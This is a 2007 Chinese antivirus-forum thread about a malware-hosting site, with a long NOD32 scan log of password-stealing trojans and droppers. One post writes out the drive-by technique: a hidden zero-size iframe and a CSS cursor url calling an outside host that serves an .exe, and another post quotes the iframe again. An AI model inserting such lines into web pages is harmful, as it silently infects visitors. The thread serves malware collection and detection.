毒网一个，爆多病毒...(更新，已把毒活捉)

显示全部楼层 · 发表于 2007-7-26 10:25:27

原帖由 Cloud018 于 2007-7-26 10:22 发表

不是，是虚拟机全不打，用来捉毒的虚拟机，哈哈哈
勇吧...

我是实体机直接到处上毒网...厉害吧

[:14:]

显示全部楼层 · 发表于 2007-7-26 10:27:08

原帖由 微点卫士 于 2007-7-26 09:51 发表
你怎么知道的啊,王子
都是JS,JS是什么东西啊???
JS=奸商

利用这些JS挂马啊

在JS里插入<IFRAME SRC="tp://rrr.rfhwfhw.com/1.htm" WIDTH=0 HEIGHT=0></IFRAME>
接着在层叠样本表插入图片
BODY {
CURSOR: url('http://rrr.rfhwfhw.com/rfhw.jpg')
}
接着在图片rfhw.jpg再插入tp://rrr.rfhwfhw.com/1.exe
就完成了挂马

显示全部楼层 · 发表于 2007-7-26 10:29:24

33个，还真......

还有几个被规则挡住了，不能解压......

显示全部楼层 · 发表于 2007-7-26 10:30:42

原帖由 tracydk 于 2007-7-26 10:25 发表

我是实体机直接到处上毒网...厉害吧

请教一下，什么是实体机？

显示全部楼层 · 发表于 2007-7-26 10:31:40

原帖由 tracydk 于 2007-7-26 10:25 发表

我是实体机直接到处上毒网...厉害吧

不怕死的强人
赞一个

显示全部楼层 · 发表于 2007-7-26 10:31:42

........................
不会吧
我这就报了2个......
红伞+NOD................................

显示全部楼层 · 发表于 2007-7-26 10:32:37

AVAST报43个

[ 本帖最后由 tracydk 于 2007-7-26 10:35 编辑 ]

显示全部楼层 · 发表于 2007-7-26 10:35:37

这个是网站的源码，有兴趣可以拿去看看...
但是我用迅雷不能把它载下来（我在迅雷新建——网址这里直接填www.ruyun140.cn），迅雷说URL不合法，这是上它的网站，用看源码的方式用记事本保存的...
如果有说会用迅雷载请说说方法

显示全部楼层 · 发表于 2007-7-26 10:36:55

Scan performed at: 2007-7-26 10:37:40
Scanning Log
NOD32 version 2421 (20070725) NT
Command line: F:\virus\virus[1].part01

Date: 26.7.2007 Time: 10:37:42
Anti-Stealth technology is enabled.
Scanned disks, folders and files: F:\virus\virus[1].part01\
F:\virus\virus[1].part01\新建文件夹\1.exe - Win32/TrojanDropper.Rime.Gen trojan
F:\virus\virus[1].part01\新建文件夹\11Sy.exe - a variant of Win32/PSW.OnLineGames.NDA trojan
F:\virus\virus[1].part01\新建文件夹\12Sy.exe - a variant of Win32/PSW.OnLineGames.NDA trojan
F:\virus\virus[1].part01\新建文件夹\13.exe - probably a variant of Win32/PSW.QQPass.VD trojan
F:\virus\virus[1].part01\新建文件夹\13Sy.exe - Win32/PSW.OnLineGames.NDN trojan
F:\virus\virus[1].part01\新建文件夹\14.exe - a variant of Win32/PSW.OnLineGames.NDA trojan
F:\virus\virus[1].part01\新建文件夹\19.exe - probably unknown NewHeur_PE virus [7]
F:\virus\virus[1].part01\新建文件夹\AlxRes070725.exe - probably a variant of Win32/Genetik trojan
F:\virus\virus[1].part01\新建文件夹\CSRSS.exe - a variant of Win32/PSW.OnLineGames.YA trojan
F:\virus\virus[1].part01\新建文件夹\go.exe - probably a variant of Win32/PSW.Delf.NHI trojan
F:\virus\virus[1].part01\新建文件夹\LSASS.EXE - a variant of Win32/PSW.OnLineGames.NDA trojan
F:\virus\virus[1].part01\新建文件夹\LYLOADER.EXE - a variant of Win32/PSW.Agent.NEC trojan
F:\virus\virus[1].part01\新建文件夹\mppds.dll - Win32/PSW.OnLineGames.ABX trojan
F:\virus\virus[1].part01\新建文件夹\mppds.exe - Win32/PSW.OnLineGames.ABX trojan
F:\virus\virus[1].part01\新建文件夹\msipfilter.dll - Win32/PSW.OnLineGames.NDN trojan
F:\virus\virus[1].part01\新建文件夹\NewTemp.bak - probably a variant of Win32/PSW.Delf.NHI trojan
F:\virus\virus[1].part01\新建文件夹\NewTemp.bkk - probably a variant of Win32/PSW.OnLineGames.NBR trojan
F:\virus\virus[1].part01\新建文件夹\NewTemp.dll - probably a variant of Win32/PSW.OnLineGames.NBR trojan
F:\virus\virus[1].part01\新建文件夹\nslkupi.exe - Win32/Agent.NEM trojan
F:\virus\virus[1].part01\新建文件夹\nwizhx2.exe - probably a variant of Win32/PSW.OnLineGames.RC trojan
F:\virus\virus[1].part01\新建文件夹\PegeFile.pif - probably a variant of Win32/PSW.Delf.NHI trojan
F:\virus\virus[1].part01\新建文件夹\qjso.exe - probably a variant of Win32/PSW.Agent.NDP trojan
F:\virus\virus[1].part01\新建文件夹\qjso0.dll - Win32/PSW.OnLineGames.NAZ trojan
F:\virus\virus[1].part01\新建文件夹\RichDll.dll - probably a variant of Win32/Viking virus
F:\virus\virus[1].part01\新建文件夹\rising673.exe - probably a variant of Win32/PSW.Delf.NHI trojan
F:\virus\virus[1].part01\新建文件夹\rundl132.exe - probably a variant of Win32/Viking virus
F:\virus\virus[1].part01\新建文件夹\rxso.exe - Win32/TrojanDropper.Rime.Gen trojan
F:\virus\virus[1].part01\新建文件夹\rxso0.dll - a variant of Win32/PSW.OnLineGames.NBD trojan
F:\virus\virus[1].part01\新建文件夹\scrsys070725.scr - probably a variant of Win32/Genetik trojan
F:\virus\virus[1].part01\新建文件夹\scvhost.exe - Win32/Delf.AWY trojan
F:\virus\virus[1].part01\新建文件夹\svchost.exe - probably unknown NewHeur_PE virus [7]
F:\virus\virus[1].part01\新建文件夹\sys332.exe - probably a variant of Win32/Viking virus
F:\virus\virus[1].part01\新建文件夹\TIMHost.exe - a variant of Win32/PSW.OnLineGames.YA trojan
F:\virus\virus[1].part01\新建文件夹\tlso.exe - Win32/TrojanDropper.Rime.Gen trojan
F:\virus\virus[1].part01\新建文件夹\upxdnd.dll - probably a variant of Win32/Genetik trojan
F:\virus\virus[1].part01\新建文件夹\upxdnd.exe - probably a variant of Win32/PSW.OnLineGames.YA trojan
F:\virus\virus[1].part01\新建文件夹\wdso.exe - Win32/TrojanDropper.Rime.Gen trojan
F:\virus\virus[1].part01\新建文件夹\wgso.exe - Win32/TrojanDropper.Rime.Gen trojan
F:\virus\virus[1].part01\新建文件夹\windhcp.ocx - a variant of Win32/Agent.NIK trojan
F:\virus\virus[1].part01\新建文件夹\winsys32_070725.dll - probably a variant of Win32/Spy.Delf.NEN trojan
F:\virus\virus[1].part01\新建文件夹\wlso.exe - Win32/TrojanDropper.Rime.Gen trojan
F:\virus\virus[1].part01\新建文件夹\wlso0.dll - Win32/PSW.OnLineGames.NDB trojan
F:\virus\virus[1].part01\新建文件夹\ztso.exe - Win32/TrojanDropper.Rime.Gen trojan
F:\virus\virus[1].part01\新建文件夹\ztso0.dll - probably a variant of Win32/Genetik trojan
F:\virus\virus[1].part01\新建文件夹\zxso.exe - Win32/TrojanDropper.Rime.Gen trojan
Number of scanned files: 102
Number of threats found: 45
Time of completion: 10:38:09 Total scanning time: 27 sec (00:00:27)

Notes:
[7] File is probably infected with an unknown virus.

显示全部楼层 · 发表于 2007-7-26 10:36:55

<IFRAME SRC="tp://rrr.rfhwfhw.com/1.htm" WIDTH=0 HEIGHT=0></IFRAME>
这个时候
红伞的html引擎发挥作用了

[病毒样本] 毒网一个，爆多病毒...(更新，已把毒活捉)

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源